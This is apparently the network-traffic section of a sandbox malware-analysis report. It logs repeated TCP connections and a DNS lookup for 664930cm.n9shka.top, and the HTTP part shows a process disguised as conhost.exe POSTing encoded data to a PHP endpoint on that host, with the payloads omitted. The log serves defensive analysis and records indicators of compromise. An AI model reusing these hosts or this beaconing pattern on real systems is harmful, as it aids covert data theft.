Oct 1, 2024 05:58:40.107502937 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.107616901 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.112435102 CEST  80           49793      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.465281010 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.470288992 CEST  80           49793      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.735183001 CEST  80           49793      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.777652979 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.871229887 CEST  80           49793      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.918329000 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.992330074 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.992831945 CEST  49794        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.999749899 CEST  80           49793      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.999804974 CEST  49793        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:40.999874115 CEST  80           49794      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:40.999927998 CEST  49794        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.000024080 CEST  49794        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.006637096 CEST  80           49794      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.262676954 CEST  49794        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.263356924 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.268353939 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.268445969 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.268526077 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.273319960 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.310411930 CEST  80           49794      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.383259058 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.388268948 CEST  80           49796      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.388335943 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.388561010 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.393327951 CEST  80           49796      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.484713078 CEST  80           49794      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.484961987 CEST  49794        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.621535063 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.626418114 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.626560926 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.747777939 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:41.752808094 CEST  80           49796      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.914860010 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:41.965161085 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.016226053 CEST  80           49796      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.045919895 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.058916092 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.090152025 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.147058964 CEST  80           49796      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.199517012 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.288592100 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.288594961 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.289345026 CEST  49797        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.294418097 CEST  80           49796      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.294493914 CEST  49796        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.294553995 CEST  80           49797      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.294565916 CEST  80           49795      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.294631004 CEST  49797        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.294634104 CEST  49795        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.294735909 CEST  49797        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.299943924 CEST  80           49797      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.652846098 CEST  49797        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:42.657915115 CEST  80           49797      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.901942015 CEST  80           49797      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:42.949569941 CEST  49797        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.030452967 CEST  80           49797      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:43.074537992 CEST  49797        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.149291992 CEST  49798        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.155205965 CEST  80           49798      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:43.155390978 CEST  49798        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.155525923 CEST  49798        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.160243034 CEST  80           49798      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:43.512151003 CEST  49798        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.517098904 CEST  80           49798      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:43.761688948 CEST  80           49798      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:43.808892965 CEST  49798        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:43.893146992 CEST  80           49798      37.44.238.250  192.168.2.6
Oct 1, 2024 05:58:43.935214996 CEST  49798        80         192.168.2.6    37.44.238.250
Oct 1, 2024 05:58:44.006951094 CEST  49797        80         192.168.2.6    37.44.238.250
                                                          Oct 1, 2024 05:58:44.011185884 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.011796951 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.016630888 CEST804979837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.016645908 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.016688108 CEST4979880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.016725063 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.016827106 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.021637917 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.372549057 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.377648115 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.633979082 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.683901072 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.764720917 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.808908939 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.893404007 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.896357059 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.900799036 CEST804979937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.900851011 CEST4979980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.903544903 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:44.903613091 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.903740883 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:44.910855055 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.262123108 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.267143011 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.510457039 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.558918953 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.638916016 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.683916092 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.757519007 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.758104086 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.762607098 CEST804980037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.762789965 CEST4980080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.762881041 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:45.766746044 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.766976118 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:45.771754980 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.121481895 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.126405954 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.369663000 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.418386936 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.500583887 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.543282032 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.621563911 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.622227907 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.626708031 CEST804980137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.627063036 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.627237082 CEST4980180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.627271891 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.627408028 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.632133007 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:46.980992079 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:46.985961914 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.081346989 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.081600904 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.086474895 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.086733103 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.086757898 CEST804980237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.086813927 CEST4980280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.086890936 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.091619968 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.339649916 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.344609022 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.344691038 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.344788074 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.349666119 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.434097052 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.439011097 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.439106941 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.699661970 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.705801964 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.727000952 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.777780056 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.859420061 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:47.902766943 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:47.971018076 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.012068987 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.105403900 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.152817011 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.225306034 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.225982904 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.225982904 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230684996 CEST804980337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.230767012 CEST4980380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230828047 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.230890036 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230926991 CEST804980437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.230947971 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.230976105 CEST4980480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.235726118 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.590233088 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.595268011 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.836812019 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:48.887084007 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:48.965194941 CEST804980537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.012048960 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.086014032 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.090838909 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.090905905 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.091048002 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.095801115 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.449748039 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.454760075 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.697241068 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.746731997 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.829682112 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.873305082 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.946461916 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.947110891 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.951714993 CEST804980637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.951872110 CEST4980680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.951926947 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:49.951992989 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.952128887 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:49.956830025 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.309144020 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.314189911 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.587229967 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.637070894 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.724678040 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.777731895 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.850223064 CEST4980580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.855619907 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.856271029 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.860774994 CEST804980737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.860857010 CEST4980780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.861083984 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:50.861133099 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.865602970 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.870343924 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.215244055 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.220129013 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.469536066 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.512044907 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.597157001 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.652645111 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.712893963 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.713540077 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.718183994 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.718233109 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.718369007 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.718430042 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.720716000 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.725532055 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.076356888 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.081231117 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.333116055 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.387034893 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.493371010 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.543327093 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.617491961 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.618453026 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.622653008 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.622715950 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.623256922 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.623336077 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.623450994 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.628238916 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.871922970 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.872523069 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.877321959 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.877394915 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.877473116 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.882222891 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.922497988 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.991818905 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.997033119 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.997246981 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.997246981 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.002566099 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.074527025 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.074589014 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.230967045 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.235833883 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.235928059 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.355865002 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.360795021 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.483678102 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.527663946 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.628072023 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.638500929 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.668298006 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.683947086 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.756694078 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.808923006 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.884196043 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.884241104 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.884993076 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.889878035 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.889962912 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.889974117 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.890005112 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.890037060 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.890048981 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.890151978 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.894913912 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.246519089 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.251524925 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.496187925 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.543340921 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.625339031 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.668294907 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.743155003 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.747967958 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.748050928 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.748373032 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.753142118 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.108308077 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.113337040 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.382473946 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.433928967 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.515005112 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.558912992 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.641257048 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.646342039 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.646486998 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.646868944 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.651716948 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.651788950 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.651913881 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.656636000 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.996628046 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.001545906 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.258166075 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.308933973 CEST4981580192.168.2.637.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 05:57:30.739207983 CEST | 63819 | 53 | 192.168.2.6 | 1.1.1.1
Oct 1, 2024 05:57:31.169207096 CEST | 53 | 63819 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 1, 2024 05:57:30.739207983 CEST | 192.168.2.6 | 1.1.1.1 | 0xbd19 | Standard query (0) | 664930cm.n9shka.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 1, 2024 05:57:31.169207096 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd19 | No error (0) | 664930cm.n9shka.top | (none) | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                                          • 664930cm.n9shka.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49706 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:57:31.179536104 CEST | 370 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Oct 1, 2024 05:57:31.528407097 CEST | 344 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:31.810553074 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:31.905071974 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:31 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 1344
    Connection: keep-alive
    Data Raw / Data Ascii: [opaque encoded body omitted; truncated in the report]
Oct 1, 2024 05:57:31.905095100 CEST | 265 | IN | Data Raw / Data Ascii: [opaque encoded body omitted]
Oct 1, 2024 05:57:31.936719894 CEST | 346 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 384
    Expect: 100-continue
Oct 1, 2024 05:57:32.115212917 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:57:32.115420103 CEST | 384 | OUT | Data Raw / Data Ascii: [opaque encoded payload omitted]
Oct 1, 2024 05:57:32.377159119 CEST | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 01 Oct 2024 03:57:32 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw / Data Ascii: [opaque encoded body omitted]
Oct 1, 2024 05:57:32.536948919 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 664930cm.n9shka.top
    Content-Length: 1840
